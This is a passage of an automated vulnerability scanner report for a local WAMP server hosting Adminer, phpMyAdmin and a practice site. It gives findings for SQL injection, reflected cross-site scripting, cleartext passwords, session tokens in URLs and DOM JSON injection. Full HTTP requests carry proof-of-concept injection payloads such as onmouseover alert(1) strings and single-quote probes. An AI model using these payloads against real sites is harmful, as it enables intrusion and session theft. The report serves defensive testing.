Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-MWU2MDUxMjZlOWYzZmU4YjNmMzg1NWQ0ZDM3MTRhYzU=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4493
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - dAYPdYZc - Adminer</title>
<link re
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.24. http://localhost/adminer/adminer-4.6.3.php [token parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The token parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the token parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=qfd3ckvk0mlk5hrpl41rj5kln4; adminer_key=67912841158106235c36bdcddfcda778; adminer_lang=bg

lang=bg&token=815669%3a574877'

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:59 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=bg; expires=Sat, 17 Nov 2018 21:02:59 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=67912841158106235c36bdcddfcda778; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-OTQ3NWM4NzZmOWVmOTJkOWIzOTczNGM3NzdiYjM2YWU=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4401
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="bg" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>........ - Adminer</title>
<link rel="style
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.25. http://localhost/adminer/adminer-4.6.3.php [username parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The username parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the username parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF'&db=AhfDADgK HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; adminer_sid=mbbo1fup7nl3ffo0hm3j017vk6; adminer_permanent=; adminer_lang=en

auth%5bdriver%5d=server&auth%5bserver%5d=XJQTysvL&auth%5busername%5d=kMlMpcXg&auth%5bpassword%5d=v5R%21k2f%21Q2&auth%5bdb%5d=FRepmkVM&auth%5bpermanent%5d=1

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:03:18 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:03:18 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:03:18 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-Y2NmMDMyMDIzMmViNTU1MWYwNDg5ZmU3NDhlNjBjNzM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4493
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - XJQTysvL - Adminer</title>
<link re
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
2. Cross-site scripting (reflected)
Previous  Next

There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site that causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality that it contains, and the other applications that belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain that can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization that owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application and exploiting users' trust in the organization in order to capture credentials for other applications that it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

References

Vulnerability classifications



2.1. http://localhost/ [lang parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://localhost
Path:   /

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload nfyh6'onmouseover='alert(1)'style='position:absolute;width:100%;height:100%;top:0;left:0;'kf80n was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /?lang=nfyh6'onmouseover%3d'alert(1)'style%3d'position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b'kf80n HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:38 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Content-Length: 5666
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
   <title>WAMPSERVER Homepage</title>
   <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=de
...[SNIP]...
<a href='add_vhost.php?lang=nfyh6'onmouseover='alert(1)'style='position:absolute;width:100%;height:100%;top:0;left:0;'kf80n'>
...[SNIP]...
2.2. http://localhost/add_vhost.php [lang parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://localhost
Path:   /add_vhost.php

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload zm9j6"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"eya9arf4y3b was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /add_vhost.php?lang=zm9j6%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22eya9arf4y3b&vh_name=978688&vh_folder=172918&vh_ip=363643&checkadd=1480203621&submit=Start+the+creation+of+the+VirtualHost+%28May+take+a+while...%29 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/add_vhost.php?lang=english
Cookie: PHPSESSID=m2q3v1qlre9d0srdoq236ilvpa

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:44 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 5150
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="fr">
   <head>
       <title>Ajouter un "Virtual Host"</title>
       <meta charset="UTF-8">
       <style>
           * {
               margin: 0;
               padding: 0;
           }

           html {
               background:
...[SNIP]...
<a href="add_vhost.php?lang=zm9j6"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"eya9arf4y3b">
...[SNIP]...
3. Cleartext submission of password
Previous  Next

There are 2 instances of this issue:

Issue background

Some applications transmit passwords over unencrypted connections, making them vulnerable to interception. To exploit this vulnerability, an attacker must be suitably positioned to eavesdrop on the victim's network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.

Vulnerabilities that result in the disclosure of users' passwords can result in compromises that are extremely difficult to investigate due to obscured audit trails. Even if the application itself only handles non-sensitive information, exposing passwords puts users who have re-used their password elsewhere at risk.

Issue remediation

Applications should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Vulnerability classifications



3.1. http://localhost/
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://localhost
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:This issue was found in multiple locations under the reported path.

Request 1

GET /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; adminer_lang=en

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:39 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:01:41 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NjM2M2NlMjQ3Y2E0Mzc2Nzg0OTc5ZjI5MTc3NmRkMTM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4324
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
</div>
<form action='' method='post'>
<div>
...[SNIP]...
<td><input type="password" name="auth[password]">
<tr>
...[SNIP]...

Request 2

GET /examplewebiste/login.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1523
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>

       <meta http-equiv="Content
...[SNIP]...
<div id="content">

   <form action="login.php" method="post">

   <fieldset>
...[SNIP]...
</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />
...[SNIP]...

Request 3

GET /examplewebiste/vulnerabilities/brute/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 3

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:42 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4323
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
</h2>

       <form action="#" method="GET">
           Username:<br />
...[SNIP]...
<br />
           <input type="password" AUTOCOMPLETE="off" name="password"><br />
...[SNIP]...
3.2. http://localhost/examplewebiste/vulnerabilities/csrf/
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csrf/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request 1

GET /examplewebiste/vulnerabilities/csrf/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,az-AZ;q=0.8,az;q=0.6,en-US;q=0.4,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost/examplewebiste/vulnerabilities/upload/
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 20:22:36 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4269
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
<br />

       <form action="#" method="GET">
           New password:<br />
           <input type="password" AUTOCOMPLETE="off" name="password_new"><br />
...[SNIP]...
<br />
           <input type="password" AUTOCOMPLETE="off" name="password_conf"><br />
...[SNIP]...
4. Session token in URL
Previous  Next

There are 2 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

Applications should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Vulnerability classifications



4.1. http://localhost/phpmyadmin/index.php
Previous  Next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://localhost
Path:   /phpmyadmin/index.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request 1

GET /phpmyadmin/index.php?db=&table=&lang=en&token=.%5e.m%3fYGGHz9M*%24Fa&lang=en HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/phpmyadmin/
Cookie: pma_lang=en; phpMyAdmin=o4gqqj8cksmreut7dot66foa0j

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:47 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: phpMyAdmin=1gmho1ppg0iso1oi36hrq7e9f9; path=/phpmyadmin/; HttpOnly
Expires: Thu, 18 Oct 2018 21:01:59 +0000
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 18 Oct 2018 21:01:59 +0000
Set-Cookie: phpMyAdmin=1gmho1ppg0iso1oi36hrq7e9f9; path=/phpmyadmin/; HttpOnly
Set-Cookie: phpMyAdmin=opem5576eabmg3225tiiiemqgs; path=/phpmyadmin/; HttpOnly
X-ob_mode: 1
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14366
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML><html lang='en' dir='ltr'><head><meta charset="utf-8" /><meta name="referrer" content="no-referrer" /><meta name="robots" content="noindex,nofollow" /><meta http-equiv="X-UA-Compatible"
...[SNIP]...
4.2. http://localhost/phpmyadmin/index.php
Previous  Next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://localhost
Path:   /phpmyadmin/index.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request 1

GET /phpmyadmin/index.php?db=&table=&lang=en&token=-%7bM%5b0%22m%2cG%3bayBFnD&lang=en HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/phpmyadmin/
Cookie: pma_lang=en; phpMyAdmin=kj3550nvs27mp0ig29kpbai12g

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:47 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: phpMyAdmin=a7fpavkn4irf2hnt3mclcq1udu; path=/phpmyadmin/; HttpOnly
Expires: Thu, 18 Oct 2018 21:01:59 +0000
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 18 Oct 2018 21:01:59 +0000
Set-Cookie: phpMyAdmin=a7fpavkn4irf2hnt3mclcq1udu; path=/phpmyadmin/; HttpOnly
Set-Cookie: phpMyAdmin=f9ja24pftsf6vthf122f6ecqei; path=/phpmyadmin/; HttpOnly
X-ob_mode: 1
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14370
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML><html lang='en' dir='ltr'><head><meta charset="utf-8" /><meta name="referrer" content="no-referrer" /><meta name="robots" content="noindex,nofollow" /><meta http-equiv="X-UA-Compatible"
...[SNIP]...
5. Client-side JSON injection (DOM-based)
Previous  Next

There are 2 instances of this issue:

Issue background

DOM-based vulnerabilities arise when a client-side script reads data from a controllable part of the DOM (for example, the URL) and processes this data in an unsafe way.

DOM-based JSON injection arises when a script incorporates controllable data into a string that is parsed as a JSON data structure and then processed by the application. An attacker may be able to use this behavior to construct a URL that, if visited by another application user, will cause arbitrary JSON data to be processed. Depending on the purpose for which this data is used, it may be possible to subvert the application's logic, or cause unintended actions on behalf of the user.

We automatically identifis this issue using static code analysis, which may lead to false positives that are not actually exploitable. The relevant code and execution paths should be reviewed to determine whether this vulnerability is indeed present, or whether mitigations are in place that would prevent exploitation.

Issue remediation

The most effective way to avoid DOM-based JSON injection vulnerabilities is not to parse as JSON any string containing data that originated from an untrusted source. If the desired functionality of the application means that this behavior is unavoidable, then defenses must be implemented within the client-side code to prevent malicious data from modifying the JSON structure in inappropriate ways. This may involve strict validation of specific items to ensure they do not contain any characters that may interfere with the structure of the JSON when it is parsed.

Vulnerability classifications



5.1. http://localhost/phpmyadmin/js/vendor/js.cookie.js
Previous  Next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/js.cookie.js

Issue detail

The application may be vulnerable to DOM-based client-side JSON injection. Data is read from document.cookie and passed to JSON.parse().

Because the data originates from a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.

Request 1

GET /phpmyadmin/js/vendor/js.cookie.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:51 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Last-Modified: Wed, 22 Aug 2018 11:36:50 GMT
ETag: "f2e-574048eead880"
Accept-Ranges: bytes
Content-Length: 3886
Connection: close
Content-Type: application/javascript

/*!
* JavaScript Cookie v2.2.0
* https://github.com/js-cookie/js-cookie
*
* Copyright 2006, 2015 Klaus Hartl & Fagner Brack
* Released under the MIT license
*/
;(function (factory) {
   var regist
...[SNIP]...
(!key) {
               result = {};
           }

           // To prevent the for loop in the first place assign an empty array
           // in case there are no cookies at all. Also prevents odd result when
           // calling "get()"
           var cookies = document.cookie ? document.cookie.split('; ') : [];
           var rdecode = /(%[0-9A-Z]{2})+/g;
           var i = 0;

           for (; i < cookies.length; i++) {
               var parts = cookies[i].split('=');
               var cookie = parts.slice(1).join('=');

               if (!this.json && cookie.charAt(0) === '"') {
                   cookie = cookie.slice(1, -1);
               }

               try {
                   var name = parts[0].replace(rdecode, decodeURIComponent);
                   cookie = converter.read ?
                       converter.read(cookie, name) : converter(cookie, name) ||
                       cookie.replace(rdecode, decodeURIComponent);


                   if (this.json) {
                       try {
                           cookie = JSON.parse(cookie);
                       } catch (e) {}
                   }

                   if (key === name) {
                       result = cookie;
                       break;
                   }

                   if (!key) {
                       result[name] = cookie;
                   }
               } catch (e) {}
           }

           return result;
       }

   
...[SNIP]...

Static analysis

Data is read from document.cookie and passed to JSON.parse() via the following statements:
5.2. http://localhost/phpmyadmin/js/vendor/js.cookie.js
Previous  Next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/js.cookie.js

Issue detail

The application may be vulnerable to DOM-based client-side JSON injection. Data is read from document.cookie and passed to JSON.parse().

Because the data originates from a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.

Request 1

GET /phpmyadmin/js/vendor/js.cookie.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:51 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Last-Modified: Wed, 22 Aug 2018 11:36:50 GMT
ETag: "f2e-574048eead880"
Accept-Ranges: bytes
Content-Length: 3886
Connection: close
Content-Type: application/javascript

/*!
* JavaScript Cookie v2.2.0
* https://github.com/js-cookie/js-cookie
*
* Copyright 2006, 2015 Klaus Hartl & Fagner Brack
* Released under the MIT license
*/
;(function (factory) {
   var regist
...[SNIP]...
(!key) {
               result = {};
           }

           // To prevent the for loop in the first place assign an empty array
           // in case there are no cookies at all. Also prevents odd result when
           // calling "get()"
           var cookies = document.cookie ? document.cookie.split('; ') : [];
           var rdecode = /(%[0-9A-Z]{2})+/g;
           var i = 0;

           for (; i < cookies.length; i++) {
               var parts = cookies[i].split('=');
               var cookie = parts.slice(1).join('=');

               if (!this.json && cookie.charAt(0) === '"') {
                   cookie = cookie.slice(1, -1);
               }

               try {
                   var name = parts[0].replace(rdecode, decodeURIComponent);
                   cookie = converter.read ?
                       converter.read(cookie, name) : converter(cookie, name) ||
                       cookie.replace(rdecode, decodeURIComponent);


                   if (this.json) {
                       try {
                           cookie = JSON.parse(cookie);
                       } catch (e) {}
                   }

                   if (key === name) {
                       result = cookie;
                       break;
                   }

                   if (!key) {
                       result[name] = cookie;
                   }
               } catch (e) {}
           }

           return result;
       }

   
...[SNIP]...

